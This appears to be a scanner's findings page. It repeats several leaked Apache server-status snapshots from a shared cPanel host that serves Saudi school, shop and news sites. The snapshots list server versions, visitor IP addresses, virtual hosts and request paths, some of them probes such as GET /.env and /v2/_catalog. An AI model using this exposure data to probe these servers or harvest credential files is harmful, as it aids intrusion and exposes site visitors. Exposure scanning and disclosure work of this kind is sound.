      1.6 requests/sec - 239.4 kB/second - 149.7 kB/request - 1080.34 ms/request
      27 requests currently being processed, 0 workers gracefully restarting, 223 idle workers
      _K__KK_____________________K_________K___________________K______
      ________K___K_____K______________________________K____K_________
      R__K_______K_______K___K_K_________W__________________K________K
      _____K______________________K_K_K__K_____K______________K_......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4221720/190/2849_
      32.843356828245430.068.44445.98
      185.191.171.13http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?i_f=1565&l_n=1&page=1&user=web HTTP
      
      0-4221721/244/2526K
      33.010114447830.818.89389.36
      162.158.166.91http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-4221720/338/2767_
      32.92137412352120.021.26335.81
      105.96.31.17http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/C6pXfKeKGvKaNSFCpq5w49
      
      0-4221720/314/2769_
      33.0054288093360.021.53300.65
      51.36.78.14http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      0-4221721/229/2790K
      33.014121750260.845.80393.68
      172.70.243.64http/1.1nidaa.ws:80GET /.env HTTP/1.1
      
      0-4221721/239/2539K
      33.014224485727.618.72383.41
      31.167.168.136http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-4221720/289/2769_
      32.79359022460170.070.94380.91
      142.154.50.117http/1.1sulaimaniya.edu.sa:443GET /wp-content/themes/kids-world/images/title-bg-left.png HTTP
      
      0-4221720/241/2546_
      32.73395217510160.064.07432.87
      175.110.149.17http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-4221720/215/3141_
      32.9310234127983870.011.96545.85
      94.97.1.134http/1.1albayan.edu.sa:443GET /imgweb/files40/fonon195.pdf HTTP/1.1
      
      0-4221720/305/2768_
      32.863003917246950.016.46410.30
      85.208.96.212http/1.1albayan.edu.sa:443GET /web/426.html2 HTTP/1.1
      
      0-4221720/207/2383_
      32.843394215427530.08.09375.92
      51.253.150.186http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/revslider/public/assets/js/extensions/r
      
      0-4221720/241/3087_
      32.79345019236060.048.50295.13
      4.255.78.239http/1.1albayan.edu.sa:80GET /robots.txt HTTP/1.1
      
      0-4221720/236/2770_
      32.92132022440950.041.15539.12
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-4221720/253/2744_
      33.001975713454060.019.54397.93
      83.99.151.66http/1.1zed.sa:80GET /product/scrambled-egg-with-cheese-bun/ HTTP/1.1
      
      0-4221720/269/2907_
      32.74368025731540.019.96314.89
      104.156.253.186http/1.1albayan.edu.sa:80HEAD /home HTTP/1.1
      
      0-4221720/199/2539_
      32.9014918511427910.011.08458.20
      95.187.115.60http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/HijCpEgUYbUQS18gwCW1MY
      
      0-4221720/212/2559_
      33.0047110153540.04.85446.93
      4.255.78.239http/1.1albayan.edu.sa:443HEAD /e_sch/css/images/arrow-next.png HTTP/1.1
      
      0-4221720/205/2705_
      32.947041219496850.048.90438.21
      114.119.153.72http/1.1daris.live:80GET /product/26 HTTP/1.1
      
      0-4221720/262/2927_
      32.72427715213010.056.73406.32
      168.138.41.19http/1.1alnwisher.com:80GET /wp-atom.php HTTP/1.1
      
      0-4221720/232/2752_
      32.59271522914780.035.07283.66
      199.45.154.26http/1.1
      
      0-4221720/286/2724_
      32.8721677822059550.037.84352.34
      83.99.151.66http/1.1zed.sa:80GET /product/double-burger/ HTTP/1.1
      
      0-4221720/264/2689_
      32.87261513987200.019.23384.74
      85.208.96.210http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=680 HTTP/1.1
      
      0-4221720/259/2682_
      32.9857116330660.016.12451.29
      51.36.78.14http/1.1albayan.edu.sa:443GET /e_sch/css/images/play.png HTTP/1.1
      
      0-4221720/227/2749_
      32.87179012432620.019.97375.94
      66.249.64.10http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1685&page=1 HTTP/1.1
      
      0-4221720/250/3021_
      32.86310218302150.071.24547.81
      31.167.72.252http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-4222000/269/2548_
      31.8324139529742090.014.13484.06
      114.119.139.61http/1.1daris.live:80GET /product/98 HTTP/1.1
      
      1-4222000/246/2615_
      31.851426429576900.017.72429.56
      105.96.31.17http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      1-4222001/262/2685K
      31.9232171728666.640.31428.72
      162.158.166.129http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-4222000/227/2451_
      31.81334218004460.033.38376.14
      51.253.150.186http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/10/WhatsApp-Image-2021-09-05-at-12
      
      1-4222000/183/2651_
      31.8229026914188520.039.19355.91
      83.99.151.64http/1.1zed.sa:80GET /product-category/hot-drinks-ar/page/1/?lang=ar HTTP/1.1
      
      1-4222000/235/2379_
      31.6438277113617370.017.88302.50
      83.99.151.71http/1.1zed.sa:80GET /product/rich-chocolate-icecream/ HTTP/1.1
      
      1-4222000/317/2508_
      31.88871213481870.048.21365.11
      85.208.96.204http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=833 HTTP/1.1
      
      
      Found on 2024-05-27 09:12
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314087d52023

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 27-May-2024 12:12:49 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  4 days 8 hours 7 minutes 59 seconds
      Server load: 0.20 0.34 0.39
      Total accesses: 599270 - Total Traffic: 85.6 GB - Total Duration: 647435238
      CPU Usage: u400.79 s47.22 cu2437.04 cs538.53 - .913% CPU load
      1.6 requests/sec - 239.4 kB/second - 149.7 kB/request - 1080.37 ms/request
      20 requests currently being processed, 0 workers gracefully restarting, 230 idle workers
      _____K_______________________________K_____K____R________K______
      ________W_______________________K____________R___K_______K______
      R__K___________________K______K_______________________K__R_____K
      ___________________________RK______K______________________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4221720/190/2849_
      32.843316828245430.068.44445.98
      185.191.171.13http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?i_f=1565&l_n=1&page=1&user=web HTTP
      
      0-4221720/243/2525_
      32.71470214447800.018.89389.35
      172.69.222.36http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-4221720/338/2767_
      32.92132412352120.021.26335.81
      105.96.31.17http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/C6pXfKeKGvKaNSFCpq5w49
      
      0-4221720/314/2769_
      33.0049288093360.021.53300.65
      51.36.78.14http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      0-4221720/228/2789_
      32.71495321750230.045.80393.68
      138.201.201.48http/1.1zed.sa:80POST /wp-cron.php?doing_wp_cron=1716800673.94795989990234375000
      
      0-4221721/239/2539K
      33.010224485727.618.72383.41
      31.167.168.136http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-4221720/289/2769_
      32.79355022460170.070.94380.91
      142.154.50.117http/1.1sulaimaniya.edu.sa:443GET /wp-content/themes/kids-world/images/title-bg-left.png HTTP
      
      0-4221720/241/2546_
      32.73390217510160.064.07432.87
      175.110.149.17http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-4221720/215/3141_
      32.939734127983870.011.96545.85
      94.97.1.134http/1.1albayan.edu.sa:443GET /imgweb/files40/fonon195.pdf HTTP/1.1
      
      0-4221720/305/2768_
      32.862953917246950.016.46410.30
      85.208.96.212http/1.1albayan.edu.sa:443GET /web/426.html2 HTTP/1.1
      
      0-4221720/207/2383_
      32.843344215427530.08.09375.92
      51.253.150.186http/1.1sulaimaniya.edu.sa:443GET /wp-content/plugins/revslider/public/assets/js/extensions/r
      
      0-4221720/241/3087_
      32.79341019236060.048.50295.13
      4.255.78.239http/1.1albayan.edu.sa:80GET /robots.txt HTTP/1.1
      
      0-4221720/236/2770_
      32.92128022440950.041.15539.12
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-4221720/253/2744_
      33.001475713454060.019.54397.93
      83.99.151.66http/1.1zed.sa:80GET /product/scrambled-egg-with-cheese-bun/ HTTP/1.1
      
      0-4221720/269/2907_
      32.74363025731540.019.96314.89
      104.156.253.186http/1.1albayan.edu.sa:80HEAD /home HTTP/1.1
      
      0-4221720/199/2539_
      32.9014418511427910.011.08458.20
      95.187.115.60http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/HijCpEgUYbUQS18gwCW1MY
      
      0-4221720/212/2559_
      33.0042110153540.04.85446.93
      4.255.78.239http/1.1albayan.edu.sa:443HEAD /e_sch/css/images/arrow-next.png HTTP/1.1
      
      0-4221720/205/2705_
      32.946641219496850.048.90438.21
      114.119.153.72http/1.1daris.live:80GET /product/26 HTTP/1.1
      
      0-4221720/262/2927_
      32.72422715213010.056.73406.32
      168.138.41.19http/1.1alnwisher.com:80GET /wp-atom.php HTTP/1.1
      
      0-4221720/232/2752_
      32.59266522914780.035.07283.66
      199.45.154.26http/1.1
      
      0-4221720/286/2724_
      32.8721177822059550.037.84352.34
      83.99.151.66http/1.1zed.sa:80GET /product/double-burger/ HTTP/1.1
      
      0-4221720/264/2689_
      32.87257513987200.019.23384.74
      85.208.96.210http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=680 HTTP/1.1
      
      0-4221720/259/2682_
      32.9852116330660.016.12451.29
      51.36.78.14http/1.1albayan.edu.sa:443GET /e_sch/css/images/play.png HTTP/1.1
      
      0-4221720/227/2749_
      32.87174012432620.019.97375.94
      66.249.64.10http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1685&page=1 HTTP/1.1
      
      0-4221720/250/3021_
      32.86305218302150.071.24547.81
      31.167.72.252http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-4222000/269/2548_
      31.8323739529742090.014.13484.06
      114.119.139.61http/1.1daris.live:80GET /product/98 HTTP/1.1
      
      1-4222000/246/2615_
      31.851376429576900.017.72429.56
      105.96.31.17http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      1-4222000/261/2684_
      31.61477217172820.040.25428.66
      31.167.72.252http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      1-4222000/227/2451_
      31.81329218004460.033.38376.14
      51.253.150.186http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/10/WhatsApp-Image-2021-09-05-at-12
      
      1-4222000/183/2651_
      31.8228626914188520.039.19355.91
      83.99.151.64http/1.1zed.sa:80GET /product-category/hot-drinks-ar/page/1/?lang=ar HTTP/1.1
      
      1-4222000/235/2379_
      31.6437877113617370.017.88302.50
      83.99.151.71http/1.1zed.sa:80GET /product/rich-chocolate-icecream/ HTTP/1.1
      
      1-4222000/317/2508_
      31.88831213481870.048.21365.11
      85.208.96.204http/1.1albayan.edu.sa:443GET /albayan_library/Book
      Found on 2024-05-27 09:12
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140bdd99346

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 26-May-2024 03:58:45 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  2 days 23 hours 53 minutes 56 seconds
      Server load: 0.70 0.60 0.65
      Total accesses: 427506 - Total Traffic: 60.0 GB - Total Duration: 438375121
      CPU Usage: u222.56 s25.05 cu1790.2 cs379.8 - .934% CPU load
      1.65 requests/sec - 242.9 kB/second - 147.1 kB/request - 1025.42 ms/request
      14 requests currently being processed, 0 workers gracefully restarting, 211 idle workers
      ________K_________R____________________________K_____________W__
      ___K_____________________________K_K_______________________K_...
      ......................______K__________________.................
      .................................____K_________K________________
      _____W______________________K__________R____....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-153790/86/2110_
      14.03236382920618290.019.85265.39
      82.197.48.14http/1.1albayan.edu.sa:443GET /imgweb/1445/4th-5th-6th%20BS%20QB%20T3-2023-2024.pdf HTTP/
      
      0-153790/113/1772_
      14.061095010800720.010.85309.35
      213.180.203.80http/1.1albayan.edu.sa:443GET /imgweb/files40/%D8%B4%D8%B1%D9%8A%D8%AD%D8%A95.JPG HTTP/1.
      
      0-153790/77/1853_
      13.887503719985630.057.14230.05
      37.107.21.57http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%86%D8%B3%D8%AE%D8%A9%20%D8%A7%D9%84%D9%88%
      
      0-153790/144/1944_
      13.98424410904970.04.41211.32
      5.111.76.240http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4ZxKmr7Lnx6PaOYBwrlqP3
      
      0-153790/119/1938_
      13.92629716937530.022.42279.29
      82.165.224.79http/1.1abu-helal.com:443GET /wp-cron.php HTTP/1.1
      
      0-153790/146/1770_
      13.93462019971390.012.40261.78
      82.165.224.198http/1.1akgsa.com:80GET /robots.txt HTTP/1.1
      
      0-153790/88/1955_
      13.6339043619416810.011.17222.62
      159.203.37.111http/1.1
      
      0-153790/91/1806_
      14.03256211995830.013.77281.10
      176.47.61.150http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-tricks/assets/js/jet-tricks-fr
      
      0-153791/127/2396K
      14.070115091980.86.22346.50
      172.69.214.159http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-153790/98/1987_
      13.86857010358050.011.75334.15
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=4&q=363&t=195.191.219.131&c=5 HT
      
      0-153790/89/1696_
      13.983920213171190.073.74324.23
      159.203.37.111http/1.1jawad.com.sa:80GET / HTTP/1.1
      
      0-153790/137/2254_
      13.86780015806620.012.27193.45
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=4&q=368&t=192.99.37.116&c=5 HTTP
      
      0-153790/143/2063_
      14.0660118435210.012.84365.19
      95.187.115.62http/1.1albayan.edu.sa:443GET /apple-touch-icon-precomposed.png HTTP/1.1
      
      0-153790/85/2031_
      13.8586158741340.032.76238.02
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=4&q=1314&t=192.99.15.17&c=5 HTTP/
      
      0-153790/114/1972_
      13.98354021191910.08.70229.35
      54.36.148.198http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1021&t=54.36.150.143&c=5 HTTP
      
      0-153790/125/1773_
      13.93553608212250.012.94326.47
      52.167.144.236http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1613&l_n=1&page=1 HTTP
      
      0-153790/132/1746_
      13.9171827783940.05.96333.48
      51.39.76.115http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/HjI3h6YUHv9uw20omG0tFv
      
      0-153790/80/1930_
      14.05183115680610.07.11291.64
      169.148.66.46http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-153790/126/2169R
      13.83898012243110.09.23261.69
      95.187.115.62http/1.1
      
      0-153790/118/1941_
      13.86810016532580.012.96211.08
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1335&t=192.99.14.159&c=5 HTTP
      
      0-153790/90/1897_
      13.69152017849640.09.77186.28
      209.38.226.34http/1.1
      
      0-153790/88/1893_
      13.9928628284680.018.92273.12
      93.158.91.29http/1.13dvi.com:443GET /images/favico.png HTTP/1.1
      
      0-153790/78/1921_
      13.9259110914634700.013.86305.75
      172.71.211.13http/1.1support.daaris.com:443GET / HTTP/1.1
      
      0-153790/120/1885_
      13.3771108726180.011.07240.27
      37.107.21.57http/1.1
      
      0-153790/88/2162_
      13.86854112013550.043.54310.33
      114.119.155.122http/1.13dvi.com:443GET /robots.txt HTTP/1.1
      
      1-186510/88/1758_
      10.9279225239100.04.32308.53
      95.187.115.62http/1.1albayan.edu.sa:443GET /web/images/name_school.png HTTP/1.1
      
      1-186510/105/1896_
      10.78794012691050.015.81297.13
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1367&t=65.108.46.72&c=5 HTTP/
      
      1-186510/117/1896_
      10.9021539177270.023.52324.34
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1716684910.13174700736999511718
      
      1-186510/80/1765_
      10.40721315185660.04.62254.39
      37.107.21.57http/1.1
      
      1-186510/103/1812_
      10.7415228578040.04.70231.40
      209.38.226.34http/1.1
      
      1-186510/76/1620_
      10.8537209642210.02.66221.53
      135.148.100.196http/1.1garndhabi.org:443GET / HTTP/1.1
      
      1-186510/113/1750_
      10.61897759226360.010.62216.40
      37.107.21.57http/1.1
      
      1-186510/66/1759_
      10.55152111968330.06.62268.14
      209.38.226.34http/1.1
      
      
      Found on 2024-05-26 00:58
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314081b5aa5a

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 26-May-2024 03:58:46 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  2 days 23 hours 53 minutes 56 seconds
      Server load: 0.70 0.60 0.65
      Total accesses: 427507 - Total Traffic: 60.0 GB - Total Duration: 438375172
      CPU Usage: u222.58 s25.05 cu1790.2 cs379.8 - .934% CPU load
      1.65 requests/sec - 242.9 kB/second - 147.1 kB/request - 1025.42 ms/request
      15 requests currently being processed, 0 workers gracefully restarting, 210 idle workers
      ________K_________R____________W_______________K_____________W__
      ___K_____________________________K_K_______________________K_...
      ......................______K__________________.................
      .................................____K_________K________________
      _____K______________________K__________R____....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-153790/86/2110_
      14.03237382920618290.019.85265.39
      82.197.48.14http/1.1albayan.edu.sa:443GET /imgweb/1445/4th-5th-6th%20BS%20QB%20T3-2023-2024.pdf HTTP/
      
      0-153790/113/1772_
      14.061095010800720.010.85309.35
      213.180.203.80http/1.1albayan.edu.sa:443GET /imgweb/files40/%D8%B4%D8%B1%D9%8A%D8%AD%D8%A95.JPG HTTP/1.
      
      0-153790/77/1853_
      13.887503719985630.057.14230.05
      37.107.21.57http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%86%D8%B3%D8%AE%D8%A9%20%D8%A7%D9%84%D9%88%
      
      0-153790/144/1944_
      13.98424410904970.04.41211.32
      5.111.76.240http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/4ZxKmr7Lnx6PaOYBwrlqP3
      
      0-153790/119/1938_
      13.92629716937530.022.42279.29
      82.165.224.79http/1.1abu-helal.com:443GET /wp-cron.php HTTP/1.1
      
      0-153790/146/1770_
      13.93462019971390.012.40261.78
      82.165.224.198http/1.1akgsa.com:80GET /robots.txt HTTP/1.1
      
      0-153790/88/1955_
      13.6339043619416810.011.17222.62
      159.203.37.111http/1.1
      
      0-153790/91/1806_
      14.03256211995830.013.77281.10
      176.47.61.150http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-tricks/assets/js/jet-tricks-fr
      
      0-153791/127/2396K
      14.071115091980.86.22346.50
      172.69.214.159http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-153790/98/1987_
      13.86857010358050.011.75334.15
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=4&q=363&t=195.191.219.131&c=5 HT
      
      0-153790/89/1696_
      13.983920213171190.073.74324.23
      159.203.37.111http/1.1jawad.com.sa:80GET / HTTP/1.1
      
      0-153790/137/2254_
      13.86780015806620.012.27193.45
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/forum/db.php?j=4&q=368&t=192.99.37.116&c=5 HTTP
      
      0-153790/143/2063_
      14.0660118435210.012.84365.19
      95.187.115.62http/1.1albayan.edu.sa:443GET /apple-touch-icon-precomposed.png HTTP/1.1
      
      0-153790/85/2031_
      13.8586158741340.032.76238.02
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=4&q=1314&t=192.99.15.17&c=5 HTTP/
      
      0-153790/114/1972_
      13.98355021191910.08.70229.35
      54.36.148.198http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1021&t=54.36.150.143&c=5 HTTP
      
      0-153790/125/1773_
      13.93553608212250.012.94326.47
      52.167.144.236http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1613&l_n=1&page=1 HTTP
      
      0-153790/132/1746_
      13.9171827783940.05.96333.48
      51.39.76.115http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/HjI3h6YUHv9uw20omG0tFv
      
      0-153790/80/1930_
      14.05183115680610.07.11291.64
      169.148.66.46http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-153790/126/2169R
      13.83898012243110.09.23261.69
      95.187.115.62http/1.1
      
      0-153790/118/1941_
      13.86811016532580.012.96211.08
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1335&t=192.99.14.159&c=5 HTTP
      
      0-153790/90/1897_
      13.69152017849640.09.77186.28
      209.38.226.34http/1.1
      
      0-153790/88/1893_
      13.9928728284680.018.92273.12
      93.158.91.29http/1.13dvi.com:443GET /images/favico.png HTTP/1.1
      
      0-153790/78/1921_
      13.9259110914634700.013.86305.75
      172.71.211.13http/1.1support.daaris.com:443GET / HTTP/1.1
      
      0-153790/120/1885_
      13.3771108726180.011.07240.27
      37.107.21.57http/1.1
      
      0-153790/88/2162_
      13.86854112013550.043.54310.33
      114.119.155.122http/1.13dvi.com:443GET /robots.txt HTTP/1.1
      
      1-186510/88/1758_
      10.9280225239100.04.32308.53
      95.187.115.62http/1.1albayan.edu.sa:443GET /web/images/name_school.png HTTP/1.1
      
      1-186510/105/1896_
      10.78794012691050.015.81297.13
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=4&q=1367&t=65.108.46.72&c=5 HTTP/
      
      1-186510/117/1896_
      10.9021539177270.023.52324.34
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1716684910.13174700736999511718
      
      1-186510/80/1765_
      10.40722315185660.04.62254.39
      37.107.21.57http/1.1
      
      1-186510/103/1812_
      10.7415228578040.04.70231.40
      209.38.226.34http/1.1
      
      1-186510/76/1620_
      10.8537209642210.02.66221.53
      135.148.100.196http/1.1garndhabi.org:443GET / HTTP/1.1
      
      1-186510/113/1750W
      10.61009226360.010.62216.40
      172.69.130.184http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      1-186510/66/1759_
      10.55152111968330.06.62268.14
      209.38.226.34http/1.1
      Found on 2024-05-26 00:58
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831400f66671a

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
